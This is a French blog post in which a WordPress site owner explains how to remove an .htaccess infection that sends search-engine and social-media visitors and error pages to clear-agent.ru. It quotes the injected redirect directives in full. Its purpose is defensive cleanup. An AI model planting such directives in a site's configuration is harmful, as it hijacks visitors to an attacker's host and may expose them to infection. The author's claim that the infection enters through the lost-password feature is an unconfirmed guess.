Clear-agent.ru vous menace

Je viens de découvrir un invité indésirable dans l’un de mes sites wordpress. Voici comment je m’en suis débarassé.

La gentille bestiole s’installe tranquillement dans votre fichier .htaccess, dans lequel elle rajoute à votre insu quelques lignes.

L’effet principal consiste à provoquer une redirection vers des sites choisis par le pollueur (en général en .ru, allez savoir pourquoi) sur des requêtes vers des pages inconnues de votre site, voire en fonction des sites référents (un moteur de recherche par exemple). Outre l’effet désastreux sur votre image de marque, je m’interroge également sur l’infection possible de l’ordinateur de votre (ex-futur) visiteur via son navigateur.

Comment vous débarrasser de cet hôte malveillant?

• Accédez à votre interface d’hébergement
• Rendez-vous dans la rubrique « gestion de fichiers »
• ouvrez votre fichier .HTACCESS (à la racine de votre site, typiquement dans le répertoire « www » ou « public_html »).
• Repérez les lignes suivantes :

RewriteEngine On
ErrorDocument 400 http://clear-agent.ru/setup/index.php
ErrorDocument 401 http://clear-agent.ru/setup/index.php
ErrorDocument 403 http://clear-agent.ru/setup/index.php
ErrorDocument 404 http://clear-agent.ru/setup/index.php
ErrorDocument 500 http://clear-agent.ru/setup/index.php
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://clear-agent.ru/setup/index.php [R=301,L]

(quelques lignes sont volontairement tronquées, je ne voudrais pas susciter de nouvelles vocations)

• Sélectionnez les entièrement
• Effacez les
• Enregistrez votre fichier…

Il se peut que les permissions de votre fichier .htaccess ne vous permettent pas de le modifier et surtout le sauvegarder. Dans ce cas, à partir de l’interface de gestion de votre hébergement, modifier les permissions au profit de 644.

Comment avez vous « attrappé » ce virus?

Après quelques recherches, il semblerait que celui-ci s’installe en utilisant la fonctionnalité « mot de passe perdu » des CMS Joomla ou WordPress, en particulier mais de tout autre moteur de site possiblement.

Mes connaissances en programmation serveur ne me permettent pas de vous en dire plus mais je pense que vous saurez maintenant vous débarrasser de cette attaque malveillante.